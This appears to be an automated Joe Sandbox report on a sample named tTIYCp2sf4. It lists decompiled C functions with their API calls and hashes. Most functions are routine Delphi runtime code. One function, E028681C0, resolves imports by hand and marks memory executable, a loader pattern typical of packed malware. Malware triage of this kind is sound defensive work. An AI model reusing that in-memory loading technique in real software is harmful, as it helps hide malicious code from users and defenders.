                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message
                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                  • API String ID: 2030045667-32948583
                                                                                                  • Opcode ID: aeacb62946a72e6f41931abd65d2f3f17238cd824225a1824a45e02d780443b8
                                                                                                  • Instruction ID: b61f54cd82f104701cc7c7f59d9fb62dd7ab9707939217bcac99d40fe006a1b3
                                                                                                  • Opcode Fuzzy Hash: aeacb62946a72e6f41931abd65d2f3f17238cd824225a1824a45e02d780443b8
                                                                                                  • Instruction Fuzzy Hash: D8A1E73CA042748BDF219A2CCC80B99BAE5EB09354F1441E5ED4DEB38ACF759989CF51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 88%
                                                                                                  			E028681C0(intOrPtr _a4, void* _a8) {
                                                                                                  				void* _v8;
                                                                                                  				struct HINSTANCE__* _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				int _t23;
                                                                                                  				void* _t49;
                                                                                                  				void* _t51;
                                                                                                  				void* _t52;
                                                                                                  
                                                                                                  				_t51 = _a8;
                                                                                                  				while(1) {
                                                                                                  					_t23 = IsBadReadPtr(_t51, 0x14);
                                                                                                  					if(_t23 != 0 ||  *((intOrPtr*)(_t51 + 0x10)) == 0 ||  *((intOrPtr*)(_t51 + 0xc)) == 0) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					_v8 =  *((intOrPtr*)(_t51 + 0xc)) + _a4;
                                                                                                  					if(IsBadReadPtr(_v8, 4) != 0) {
                                                                                                  						L13:
                                                                                                  						_t51 = _t51 + 0x14;
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					 *0x28a639c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\KernelBase.dll"), "LoadLibraryExA");
                                                                                                  					_v12 =  *0x28a639c(_v8, 0, 0);
                                                                                                  					_t49 =  *((intOrPtr*)(_t51 + 0x10)) + _a4;
                                                                                                  					_t52 = _t49;
                                                                                                  					if( *((intOrPtr*)(_t51 + 4)) == 0xffffffff) {
                                                                                                  						_t49 =  *_t51 + _a4;
                                                                                                  					}
                                                                                                  					while(IsBadReadPtr(_t49, 4) == 0 && IsBadReadPtr(_t52, 2) == 0 &&  *_t49 != 0) {
                                                                                                  						if(E02867A60(0, _t52, 4, 0x40, _v16) != 0) {
                                                                                                  							if(( *(_t49 + 3) & 0x00000080) == 0) {
                                                                                                  								 *_t52 = GetProcAddress(_v12, _a4 +  *_t49 + 2);
                                                                                                  							} else {
                                                                                                  								 *_t52 = GetProcAddress(_v12,  *_t49 & 0x0000ffff);
                                                                                                  							}
                                                                                                  							E02867A60(0, _t52, 4, _v16, _v16);
                                                                                                  						}
                                                                                                  						_t49 = _t49 + 4;
                                                                                                  						_t52 = _t52 + 4;
                                                                                                  					}
                                                                                                  					goto L13;
                                                                                                  				}
                                                                                                  				return _t23;
                                                                                                  			}











                                                                                                  APIs
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 028681E0
                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028681F7
                                                                                                  • GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028681FD
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0286828B
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02868297
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 028682AB
                                                                                                  Strings
                                                                                                  • LoadLibraryExA, xrefs: 028681ED
                                                                                                  • C:\Windows\System32\KernelBase.dll, xrefs: 028681F2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Read$AddressHandleModuleProc
                                                                                                  • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                  • API String ID: 1061262613-1650066521
                                                                                                  • Opcode ID: c928fc199a155c409ccb76d2cb9e83a7341717814cdd4848ded0e893a3f80d66
                                                                                                  • Instruction ID: 0b8b5b718ad903e798701743cdb8567ff7b47636134eda1c5705eeedd06d5a58
                                                                                                  • Opcode Fuzzy Hash: c928fc199a155c409ccb76d2cb9e83a7341717814cdd4848ded0e893a3f80d66
                                                                                                  • Instruction Fuzzy Hash: E131847DA40614BBEB60DB98CC89F7AB7E9AF05318F044150FA1CDB381E730A9548FA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 72%
                                                                                                  			E0285BDA4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                  				char _v8;
                                                                                                  				char _v12;
                                                                                                  				char _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				char _v28;
                                                                                                  				char _v32;
                                                                                                  				char _v36;
                                                                                                  				char _v40;
                                                                                                  				char _v44;
                                                                                                  				char _v48;
                                                                                                  				char _v52;
                                                                                                  				char _v56;
                                                                                                  				char _v60;
                                                                                                  				char _v64;
                                                                                                  				char _v68;
                                                                                                  				void* _t104;
                                                                                                  				void* _t111;
                                                                                                  				void* _t133;
                                                                                                  				intOrPtr _t183;
                                                                                                  				intOrPtr _t193;
                                                                                                  				intOrPtr _t194;
                                                                                                  
                                                                                                  				_t191 = __esi;
                                                                                                  				_t190 = __edi;
                                                                                                  				_t193 = _t194;
                                                                                                  				_t133 = 8;
                                                                                                  				do {
                                                                                                  					_push(0);
                                                                                                  					_push(0);
                                                                                                  					_t133 = _t133 - 1;
                                                                                                  				} while (_t133 != 0);
                                                                                                  				_push(__ebx);
                                                                                                  				_push(_t193);
                                                                                                  				_push(0x285c06f);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t194;
                                                                                                  				E0285BCE0();
                                                                                                  				E0285A85C(__ebx, __edi, __esi);
                                                                                                  				_t196 =  *0x28a58d8;
                                                                                                  				if( *0x28a58d8 != 0) {
                                                                                                  					E0285AA34(__esi, _t196);
                                                                                                  				}
                                                                                                  				_t132 = GetThreadLocale();
                                                                                                  				E0285A7A8(_t43, 0, 0x14,  &_v20);
                                                                                                  				E028544F4(0x28a580c, _v20);
                                                                                                  				E0285A7A8(_t43, 0x285c084, 0x1b,  &_v24);
                                                                                                  				 *0x28a5810 = E02857AEC(0x285c084, 0, _t196);
                                                                                                  				E0285A7A8(_t132, 0x285c084, 0x1c,  &_v28);
                                                                                                  				 *0x28a5811 = E02857AEC(0x285c084, 0, _t196);
                                                                                                  				 *0x28a5812 = E0285A7F4(_t132, 0x2c, 0xf);
                                                                                                  				 *0x28a5813 = E0285A7F4(_t132, 0x2e, 0xe);
                                                                                                  				E0285A7A8(_t132, 0x285c084, 0x19,  &_v32);
                                                                                                  				 *0x28a5814 = E02857AEC(0x285c084, 0, _t196);
                                                                                                  				 *0x28a5815 = E0285A7F4(_t132, 0x2f, 0x1d);
                                                                                                  				E0285A7A8(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                                  				E0285AAE4(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                                  				E028544F4(0x28a5818, _v36);
                                                                                                  				E0285A7A8(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                                  				E0285AAE4(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                                  				E028544F4(0x28a581c, _v44);
                                                                                                  				 *0x28a5820 = E0285A7F4(_t132, 0x3a, 0x1e);
                                                                                                  				E0285A7A8(_t132, 0x285c0b8, 0x28,  &_v52);
                                                                                                  				E028544F4(0x28a5824, _v52);
                                                                                                  				E0285A7A8(_t132, 0x285c0c4, 0x29,  &_v56);
                                                                                                  				E028544F4(0x28a5828, _v56);
                                                                                                  				E028544A0( &_v12);
                                                                                                  				E028544A0( &_v16);
                                                                                                  				E0285A7A8(_t132, 0x285c084, 0x25,  &_v60);
                                                                                                  				_t104 = E02857AEC(0x285c084, 0, _t196);
                                                                                                  				_t197 = _t104;
                                                                                                  				if(_t104 != 0) {
                                                                                                  					E02854538( &_v8, 0x285c0dc);
                                                                                                  				} else {
                                                                                                  					E02854538( &_v8, 0x285c0d0);
                                                                                                  				}
                                                                                                  				E0285A7A8(_t132, 0x285c084, 0x23,  &_v64);
                                                                                                  				_t111 = E02857AEC(0x285c084, 0, _t197);
                                                                                                  				_t198 = _t111;
                                                                                                  				if(_t111 == 0) {
                                                                                                  					E0285A7A8(_t132, 0x285c084, 0x1005,  &_v68);
                                                                                                  					if(E02857AEC(0x285c084, 0, _t198) != 0) {
                                                                                                  						E02854538( &_v12, 0x285c0f8);
                                                                                                  					} else {
                                                                                                  						E02854538( &_v16, 0x285c0e8);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_push(_v12);
                                                                                                  				_push(_v8);
                                                                                                  				_push(":mm");
                                                                                                  				_push(_v16);
                                                                                                  				E02854824();
                                                                                                  				_push(_v12);
                                                                                                  				_push(_v8);
                                                                                                  				_push(":mm:ss");
                                                                                                  				_push(_v16);
                                                                                                  				E02854824();
                                                                                                  				 *0x28a58da = E0285A7F4(_t132, 0x2c, 0xc);
                                                                                                  				_pop(_t183);
                                                                                                  				 *[fs:eax] = _t183;
                                                                                                  				_push(0x285c076);
                                                                                                  				return E028544C4( &_v68, 0x10);
                                                                                                  			}


























                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000000,0285C06F,?,?,00000000,00000000), ref: 0285BDDA
                                                                                                    • Part of subcall function 0285A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$InfoThread
                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                  • Opcode ID: f9d67d0b6ba0243b0fbfa290e42cd87616ee53002a8c08d2654875c70c690701
                                                                                                  • Instruction ID: 17f421a50b24b3864017f88f94356c3e91f280f58524789cb09b731191fcf5de
                                                                                                  • Opcode Fuzzy Hash: f9d67d0b6ba0243b0fbfa290e42cd87616ee53002a8c08d2654875c70c690701
                                                                                                  • Instruction Fuzzy Hash: 6361233CB102689BDB04EBACD89069F77FBDB88300F509535AA01EB345CA79D949CF52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 79%
                                                                                                  			E02854320(void* __ecx) {
                                                                                                  				long _v4;
                                                                                                  				int _t3;
                                                                                                  
                                                                                                  				if( *0x28a304c == 0) {
                                                                                                  					if( *0x2877030 == 0) {
                                                                                                  						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                  					}
                                                                                                  					return _t3;
                                                                                                  				} else {
                                                                                                  					if( *0x28a3220 == 0xd7b2 &&  *0x28a3228 > 0) {
                                                                                                  						 *0x28a3238();
                                                                                                  					}
                                                                                                  					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                  					return WriteFile(GetStdHandle(0xfffffff5), E028543A8, 2,  &_v4, 0);
                                                                                                  				}
                                                                                                  			}






                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?,028A57C8,?,?,028777A8,02856575,02876305), ref: 02854359
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?,028A57C8,?,?,028777A8,02856575,02876305), ref: 0285435F
                                                                                                  • GetStdHandle.KERNEL32(000000F5,028543A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?,028A57C8), ref: 02854374
                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,028543A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028543E7,?,?), ref: 0285437A
                                                                                                  • MessageBoxA.USER32 ref: 02854398
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                  • Opcode ID: f46657d1090c1d0403496a402849910e341d2777f0bbdb6eb1f250e450ec52cd
                                                                                                  • Instruction ID: baabc7b9519e5b52f5ed3a97ab64da10633894f9417da9eac356bcb0c501579c
                                                                                                  • Opcode Fuzzy Hash: f46657d1090c1d0403496a402849910e341d2777f0bbdb6eb1f250e450ec52cd
                                                                                                  • Instruction Fuzzy Hash: 5AF0906CEC03A078FB10A7B4AC0AF99670D5740B52F144A85BA28E50D0DBA480C8C722
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E0285E570(short* __eax, intOrPtr __ecx, signed short* __edx) {
                                                                                                  				char _v260;
                                                                                                  				char _v768;
                                                                                                  				char _v772;
                                                                                                  				short* _v776;
                                                                                                  				intOrPtr _v780;
                                                                                                  				char _v784;
                                                                                                  				signed int _v788;
                                                                                                  				signed short* _v792;
                                                                                                  				char _v796;
                                                                                                  				char _v800;
                                                                                                  				intOrPtr* _v804;
                                                                                                  				void* __ebp;
                                                                                                  				signed char _t47;
                                                                                                  				signed int _t54;
                                                                                                  				void* _t62;
                                                                                                  				intOrPtr* _t73;
                                                                                                  				signed short* _t91;
                                                                                                  				void* _t93;
                                                                                                  				void* _t95;
                                                                                                  				void* _t98;
                                                                                                  				void* _t99;
                                                                                                  				intOrPtr* _t108;
                                                                                                  				void* _t112;
                                                                                                  				intOrPtr _t113;
                                                                                                  				char* _t114;
                                                                                                  				void* _t115;
                                                                                                  
                                                                                                  				_t100 = __ecx;
                                                                                                  				_v780 = __ecx;
                                                                                                  				_t91 = __edx;
                                                                                                  				_v776 = __eax;
                                                                                                  				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                                                  					E0285E014(0x80070057);
                                                                                                  				}
                                                                                                  				_t47 =  *_t91 & 0x0000ffff;
                                                                                                  				if((_t47 & 0x00000fff) != 0xc) {
                                                                                                  					_push(_t91);
                                                                                                  					_push(_v776);
                                                                                                  					L0285CDD4();
                                                                                                  					return E0285E014(_v776);
                                                                                                  				} else {
                                                                                                  					if((_t47 & 0x00000040) == 0) {
                                                                                                  						_v792 = _t91[4];
                                                                                                  					} else {
                                                                                                  						_v792 =  *(_t91[4]);
                                                                                                  					}
                                                                                                  					_v788 =  *_v792 & 0x0000ffff;
                                                                                                  					_t93 = _v788 - 1;
                                                                                                  					if(_t93 < 0) {
                                                                                                  						L9:
                                                                                                  						_push( &_v772);
                                                                                                  						_t54 = _v788;
                                                                                                  						_push(_t54);
                                                                                                  						_push(0xc);
                                                                                                  						L0285D22C();
                                                                                                  						_t113 = _t54;
                                                                                                  						if(_t113 == 0) {
                                                                                                  							E0285DD6C(_t100);
                                                                                                  						}
                                                                                                  						E0285E3C4(_v776);
                                                                                                  						 *_v776 = 0x200c;
                                                                                                  						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                                                  						_t95 = _v788 - 1;
                                                                                                  						if(_t95 < 0) {
                                                                                                  							L14:
                                                                                                  							_t97 = _v788 - 1;
                                                                                                  							if(E0285E4E4(_v788 - 1, _t115) != 0) {
                                                                                                  								L0285D244();
                                                                                                  								E0285E014(_v792);
                                                                                                  								L0285D244();
                                                                                                  								E0285E014( &_v260);
                                                                                                  								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                                  							}
                                                                                                  							_t62 = E0285E514(_t97, _t115);
                                                                                                  						} else {
                                                                                                  							_t98 = _t95 + 1;
                                                                                                  							_t73 =  &_v768;
                                                                                                  							_t108 =  &_v260;
                                                                                                  							do {
                                                                                                  								 *_t108 =  *_t73;
                                                                                                  								_t108 = _t108 + 4;
                                                                                                  								_t73 = _t73 + 8;
                                                                                                  								_t98 = _t98 - 1;
                                                                                                  							} while (_t98 != 0);
                                                                                                  							do {
                                                                                                  								goto L14;
                                                                                                  							} while (_t62 != 0);
                                                                                                  							return _t62;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						_t99 = _t93 + 1;
                                                                                                  						_t112 = 0;
                                                                                                  						_t114 =  &_v772;
                                                                                                  						do {
                                                                                                  							_v804 = _t114;
                                                                                                  							_push(_v804 + 4);
                                                                                                  							_t18 = _t112 + 1; // 0x1
                                                                                                  							_push(_v792);
                                                                                                  							L0285D234();
                                                                                                  							E0285E014(_v792);
                                                                                                  							_push( &_v784);
                                                                                                  							_t21 = _t112 + 1; // 0x1
                                                                                                  							_push(_v792);
                                                                                                  							L0285D23C();
                                                                                                  							E0285E014(_v792);
                                                                                                  							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                                  							_t112 = _t112 + 1;
                                                                                                  							_t114 = _t114 + 8;
                                                                                                  							_t99 = _t99 - 1;
                                                                                                  						} while (_t99 != 0);
                                                                                                  						goto L9;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}





























                                                                                                  APIs
                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0285E609
                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0285E625
                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0285E65E
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0285E6DB
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0285E6F4
                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 0285E729
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 351091851-0
                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                  • Instruction ID: 788cfad8320b4cc412e2131817fe20c930f893f961c76810d35015fa2655debe
                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                  • Instruction Fuzzy Hash: F951D57D9006299BCB66DB58CC90BD9B7FDAF48340F0441D5EA09E7212DB30AF858F62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 63%
                                                                                                  			E0285355C() {
                                                                                                  				void* _v8;
                                                                                                  				char _v12;
                                                                                                  				int _v16;
                                                                                                  				signed short _t14;
                                                                                                  				intOrPtr _t27;
                                                                                                  				void* _t29;
                                                                                                  				void* _t31;
                                                                                                  				intOrPtr _t32;
                                                                                                  
                                                                                                  				_t29 = _t31;
                                                                                                  				_t32 = _t31 + 0xfffffff4;
                                                                                                  				_v12 =  *0x2877024 & 0x0000ffff;
                                                                                                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                  					_t14 =  *0x2877024 & 0xffc0 | _v12 & 0x3f;
                                                                                                  					 *0x2877024 = _t14;
                                                                                                  					return _t14;
                                                                                                  				} else {
                                                                                                  					_push(_t29);
                                                                                                  					_push(0x28535cd);
                                                                                                  					_push( *[fs:eax]);
                                                                                                  					 *[fs:eax] = _t32;
                                                                                                  					_v16 = 4;
                                                                                                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                  					_pop(_t27);
                                                                                                  					 *[fs:eax] = _t27;
                                                                                                  					_push(0x28535d4);
                                                                                                  					return RegCloseKey(_v8);
                                                                                                  				}
                                                                                                  			}











                                                                                                  APIs
                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0285357E
                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028535CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028535B1
                                                                                                  • RegCloseKey.ADVAPI32(?,028535D4,00000000,?,00000004,00000000,028535CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028535C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                  • Opcode ID: 264a6c846420cd92b111ff1b602980435510415f0926d8ba4f5934af6025c60f
                                                                                                  • Instruction ID: 87d334107ebacb9d8a2b61002ff9bfaaa05eeecfad9bafb8d3206718b7b6c7aa
                                                                                                  • Opcode Fuzzy Hash: 264a6c846420cd92b111ff1b602980435510415f0926d8ba4f5934af6025c60f
                                                                                                  • Instruction Fuzzy Hash: 1B01D87DA40328BAFB11DB90CC06FBDB7ECDB08740F1005E1BE04D6680E6749A60DB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E0285AA34(void* __esi, void* __eflags) {
                                                                                                  				char _v8;
                                                                                                  				intOrPtr* _t18;
                                                                                                  				intOrPtr _t26;
                                                                                                  				void* _t27;
                                                                                                  				long _t29;
                                                                                                  				intOrPtr _t32;
                                                                                                  				void* _t33;
                                                                                                  
                                                                                                  				_t33 = __eflags;
                                                                                                  				_push(0);
                                                                                                  				_push(_t32);
                                                                                                  				_push(0x285aacb);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t32;
                                                                                                  				E0285A7A8(GetThreadLocale(), 0x285aae0, 0x100b,  &_v8);
                                                                                                  				_t29 = E02857AEC(0x285aae0, 1, _t33);
                                                                                                  				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                                  					EnumCalendarInfoA(E0285A980, GetThreadLocale(), _t29, 4);
                                                                                                  					_t27 = 7;
                                                                                                  					_t18 = 0x28a58f8;
                                                                                                  					do {
                                                                                                  						 *_t18 = 0xffffffff;
                                                                                                  						_t18 = _t18 + 4;
                                                                                                  						_t27 = _t27 - 1;
                                                                                                  					} while (_t27 != 0);
                                                                                                  					EnumCalendarInfoA(E0285A9BC, GetThreadLocale(), _t29, 3);
                                                                                                  				}
                                                                                                  				_pop(_t26);
                                                                                                  				 *[fs:eax] = _t26;
                                                                                                  				_push(0x285aad2);
                                                                                                  				return E028544A0( &_v8);
                                                                                                  			}










                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,0285AACB,?,?,00000000), ref: 0285AA4C
                                                                                                    • Part of subcall function 0285A7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6
                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0285AACB,?,?,00000000), ref: 0285AA7C
                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A980,00000000,00000000,00000004), ref: 0285AA87
                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0285AACB,?,?,00000000), ref: 0285AAA5
                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9BC,00000000,00000000,00000003), ref: 0285AAB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                  • String ID:
                                                                                                  • API String ID: 4102113445-0
                                                                                                  • Opcode ID: 4a81016933e128c42014c9a231fb0f67cf0201705f3eab9a9ea8e9ce616a50be
                                                                                                  • Instruction ID: d411aaa6a861f070838ebf09223acdf47b68bb1d01dc53347ed9b6c503946012
                                                                                                  • Opcode Fuzzy Hash: 4a81016933e128c42014c9a231fb0f67cf0201705f3eab9a9ea8e9ce616a50be
                                                                                                  • Instruction Fuzzy Hash: 32012B7C6402347FF306AB788D51B6F72ADDB45720FD10760FD11E66C0F5689E108A66
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E0285AAE4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                  				intOrPtr _v8;
                                                                                                  				char _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				char _v20;
                                                                                                  				char _v24;
                                                                                                  				void* _t45;
                                                                                                  				void* _t47;
                                                                                                  				void* _t49;
                                                                                                  				void* _t51;
                                                                                                  				intOrPtr _t75;
                                                                                                  				void* _t76;
                                                                                                  				void* _t77;
                                                                                                  				void* _t83;
                                                                                                  				void* _t92;
                                                                                                  				intOrPtr _t111;
                                                                                                  				void* _t122;
                                                                                                  				void* _t124;
                                                                                                  				intOrPtr _t127;
                                                                                                  				void* _t128;
